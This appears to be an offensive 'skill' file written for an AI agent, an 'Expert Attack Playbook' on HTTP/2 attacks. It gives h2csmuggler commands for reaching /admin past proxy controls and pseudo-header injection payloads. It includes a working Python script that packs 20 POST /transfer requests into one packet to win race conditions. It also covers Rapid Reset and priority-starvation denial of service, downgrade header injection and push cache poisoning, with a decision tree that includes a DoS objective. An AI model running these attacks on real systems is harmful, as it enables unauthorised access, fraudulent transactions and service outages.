SKILL: HTTP/2 Specific Attacks — Expert Attack Playbook
AI LOAD INSTRUCTION: HTTP/2 protocol-level attack techniques beyond basic request smuggling. Covers h2c smuggling, pseudo-header manipulation, HPACK attacks, single-packet race conditions, and H2→H1 downgrade injection. Base models conflate HTTP/2 smuggling with HTTP/1.1 smuggling — this skill focuses on H2-unique attack surface.
0. RELATED ROUTING
- request-smuggling — CL.TE/TE.CL/TE.TE fundamentals and H2.CL/H2.TE variants
- request-smuggling/H2_SMUGGLING_VARIANTS.md — byte-level H2.CL/H2.TE payloads, CL.0, client-side desync
- race-condition — single-packet attack leverages H2 multiplexing for race conditions
- web-cache-deception — cache poisoning via H2 smuggled responses
1. HTTP/2 ATTACK SURFACE OVERVIEW
| Feature | Attack Surface |
|---|---|
| Binary framing | Frame-level manipulation, parser differentials |
| HPACK compression | Compression oracles (CRIME/BREACH), table poisoning |
| Multiplexing | Single-packet race conditions, RST_STREAM flood |
| Server push | Cache poisoning via unsolicited push |
Pseudo-headers (:method/:path/:authority/:scheme) | Injection, request splitting, path discrepancy |
2. h2c (HTTP/2 CLEARTEXT) SMUGGLING
2.1 Concept
h2c is HTTP/2 without TLS, negotiated via the HTTP/1.1 Upgrade mechanism. Many reverse proxies forward the Upgrade: h2c header without understanding it, allowing attackers to bypass proxy-level access controls.
Client ──[Upgrade: h2c]──> Reverse Proxy ──[forwards blindly]──> Backend
│
Backend speaks H2
Proxy is blind to
the H2 conversation
2.2 Attack Flow
1. Client sends HTTP/1.1 request with:
GET / HTTP/1.1
Host: target.com
Upgrade: h2c
HTTP2-Settings: <base64 H2 settings>
Connection: Upgrade, HTTP2-Settings
2. Proxy forwards request (doesn't understand h2c)
3. Backend responds: HTTP/1.1 101 Switching Protocols
4. Connection is now HTTP/2 between client and backend
5. Proxy is now a TCP tunnel — cannot inspect/filter H2 frames
6. Client sends H2 requests directly to backend, bypassing proxy rules
2.3 What You Can Bypass
✓ Path-based access controls (/admin blocked at proxy → accessible via h2c)
✓ WAF rules (proxy-side WAF can't inspect H2 binary frames)
✓ Rate limiting (proxy-level rate limits bypassed)
✓ Authentication (proxy-enforced auth headers)
✓ IP restrictions (proxy validates source IP, but h2c tunnel bypasses)
2.4 Tool: h2csmuggler
# Install
git clone https://github.com/BishopFox/h2csmuggler
cd h2csmuggler
pip3 install h2
# Basic smuggle — access /admin bypassing proxy restrictions
python3 h2csmuggler.py -x https://target.com/ --test
# Smuggle specific path
python3 h2csmuggler.py -x https://target.com/ -X GET -p /admin/users
# With custom headers
python3 h2csmuggler.py -x https://target.com/ -X GET -p /admin \
-H "Authorization: Bearer token123"
2.5 Detection
# Check if backend supports h2c upgrade
curl -v --http1.1 https://target.com/ \
-H "Upgrade: h2c" \
-H "HTTP2-Settings: AAMAAABkAAQCAAAAAAIAAAAA" \
-H "Connection: Upgrade, HTTP2-Settings"
# 101 Switching Protocols → h2c supported
# 200/400/other → h2c not supported or proxy blocks upgrade
3. PSEUDO-HEADER INJECTION
3.1 HTTP/2 Pseudo-Headers
HTTP/2 replaces the request line with pseudo-headers (prefixed with :):
| Pseudo-Header | HTTP/1.1 Equivalent | Example |
|---|---|---|
:method | Request method | GET, POST |
:path | Request URI | /api/users |
:authority | Host header | target.com |
:scheme | Protocol | https |
3.2 Path Discrepancy Between Proxy and Backend
Scenario: Proxy routes based on :path, backend uses different parsing
H2 request:
:method: GET
:path: /public/../admin/users
:authority: target.com
Proxy sees: /public/../admin/users → matches /public/* rule → ALLOWED
Backend normalizes: /admin/users → serves admin content
3.3 Duplicate Pseudo-Header Injection
HTTP/2 spec forbids duplicate pseudo-headers, but implementation varies:
:method: GET
:path: /public
:path: /admin ← duplicate, forbidden by spec
:authority: target.com
Proxy may use first :path (/public) for routing
Backend may use last :path (/admin) for serving
3.4 Authority vs Host Disagreement
:authority: public.target.com ← proxy routes based on this
host: admin.internal.target.com ← backend may prefer Host header
Result: proxy routes to public vhost, backend serves admin vhost
3.5 Scheme Manipulation
:scheme: https
:path: /api/internal
:authority: target.com
If backend trusts :scheme to determine if request is "internal":
:scheme: https → "external" → restricted
:scheme: http → "internal" → unrestricted access
4. HPACK COMPRESSION ATTACKS
4.1 CRIME/BREACH on HTTP/2
Principle: HPACK compresses headers. If attacker controls part of a header and a secret
exists in the same compression context, matching guesses → smaller frames → oracle.
Limitation: HPACK uses static+dynamic table (not raw DEFLATE), per-connection table,
requires many requests on same connection. Harder than original CRIME.
4.2 Header Table Poisoning
HPACK dynamic table stores recent headers across requests on same connection.
1. Attacker sends X-Custom: malicious-value → added to dynamic table
2. Subsequent requests may reference this entry
3. If CDN/proxy pools connections → attacker and victim share table → cross-request leakage
5. STREAM MULTIPLEXING ABUSE
5.1 Single-Packet Attack (Race Conditions)
HTTP/2 multiplexing allows sending multiple requests in a single TCP packet, achieving true simultaneous server-side processing:
Traditional race condition: send N requests → network jitter → inconsistent timing
H2 single-packet: pack N requests into one TCP segment → all arrive simultaneously
┌─ Stream 1: POST /transfer (amount=1000)
Single TCP packet ──├─ Stream 3: POST /transfer (amount=1000)
├─ Stream 5: POST /transfer (amount=1000)
└─ Stream 7: POST /transfer (amount=1000)
All 4 requests processed at the same nanosecond window
# Using h2 library — prepare all requests, send in single write
import h2.connection, h2.config, socket, ssl
ctx = ssl.create_default_context()
ctx.set_alpn_protocols(['h2'])
sock = ctx.wrap_socket(socket.create_connection((host, 443)), server_hostname=host)
conn = h2.connection.H2Connection(config=h2.config.H2Configuration(client_side=True))
conn.initiate_connection()
sock.sendall(conn.data_to_send())
for i in range(20):
sid = conn.get_next_available_stream_id()
conn.send_headers(sid, [(':method','POST'),(':path',path),(':authority',host),(':scheme','https')])
conn.send_data(sid, b'amount=1000', end_stream=True)
sock.sendall(conn.data_to_send()) # ALL frames in single TCP packet
5.2 RST_STREAM Flood (CVE-2023-44487 "Rapid Reset")
Attack: HEADERS (open stream) → RST_STREAM (cancel) → repeat thousands/sec
Server processes each open/close but client doesn't wait for responses
Amplification: minimal client resources → massive server CPU exhaustion
5.3 PRIORITY Manipulation
Set exclusive=true + weight=256 on attacker's stream → starve other users' requests
6. HTTP/2 → HTTP/1.1 DOWNGRADE ISSUES
6.1 Header Injection via Binary Format
H2 header values are binary — \r\n is valid data within a value. When proxy downgrades to H1, \r\n in header value becomes actual line break → header injection.
H2: X-Custom: "value\r\nInjected: evil" → binary, valid
H1: X-Custom: value → line break
Injected: evil → new header!
6.2 Transfer-Encoding Smuggling
H2 spec forbids transfer-encoding, but some proxies pass it through during downgrade → backend processes chunked encoding → H2.TE smuggling. See ../request-smuggling/H2_SMUGGLING_VARIANTS.md.
6.3 Content-Length Discrepancy
H2 uses frame length (no CL needed). If proxy generates CL during downgrade but attacker also sent a CL header → conflicting lengths → request smuggling.
6.4 Header Name Case
H2 requires lowercase. Sending Transfer-Encoding (uppercase) is invalid H2 but some proxies pass it → valid H1 header on backend.
7. SERVER PUSH CACHE POISONING
Attack: trigger server push for /static/app.js with attacker-controlled content
→ PUSH_PROMISE frame pushes malicious response
→ browser/CDN caches poisoned content under legitimate URL
→ all subsequent loads serve attacker's content
Mitigation: most modern browsers/CDNs restrict or disable server push
8. DECISION TREE
Target supports HTTP/2?
│
├── YES
│ ├── Does proxy support h2c upgrade?
│ │ ├── YES → h2c smuggling (Section 2)
│ │ │ └── Access restricted paths bypassing proxy rules
│ │ └── NO → Continue
│ │
│ ├── H2→H1 downgrade between proxy and backend?
│ │ ├── YES → Header injection via binary format (Section 6.1)
│ │ │ ├── TE header passthrough? → H2.TE smuggling (Section 6.2)
│ │ │ ├── CL discrepancy? → H2.CL smuggling (Section 6.3)
│ │ │ └── See ../request-smuggling/H2_SMUGGLING_VARIANTS.md
│ │ └── NO (end-to-end H2) → Continue
│ │
│ ├── Need race condition?
│ │ ├── YES → Single-packet attack via multiplexing (Section 5.1)
│ │ │ └── Pack N requests in one TCP segment
│ │ └── NO → Continue
│ │
│ ├── Pseudo-header manipulation viable?
│ │ ├── :path discrepancy → path confusion (Section 3.2)
│ │ ├── :authority vs Host → vhost confusion (Section 3.4)
│ │ └── :scheme manipulation → access control bypass (Section 3.5)
│ │
│ ├── Server push enabled?
│ │ ├── YES → Cache poisoning via push (Section 7)
│ │ └── NO → Continue
│ │
│ └── DoS objective?
│ ├── RST_STREAM rapid reset (Section 5.2)
│ └── PRIORITY starvation (Section 5.3)
│
└── NO (HTTP/1.1 only)
└── See ../request-smuggling/SKILL.md for H1-specific techniques
9. TOOLS REFERENCE
| Tool | Purpose |
|---|---|
| h2csmuggler | h2c upgrade smuggling (github.com/BishopFox/h2csmuggler) |
| http2smugl | H2-specific desync testing (github.com/neex/http2smugl) |
| h2 (Python) | HTTP/2 protocol lib for frame crafting (github.com/python-hyper/h2) |
| nghttp2 | H2 client/server tools (nghttp2.org) |
| Burp HTTP Request Smuggler | Automated variant scanning |
| curl --http2 | Quick H2 probing (built-in) |
10. QUICK REFERENCE
# h2c probe
curl -v --http1.1 https://target.com/ -H "Upgrade: h2c" -H "Connection: Upgrade, HTTP2-Settings" -H "HTTP2-Settings: AAMAAABkAAQCAAAAAAIAAAAA"
# H2 support check
curl -v --http2 https://target.com/ 2>&1 | grep "ALPN"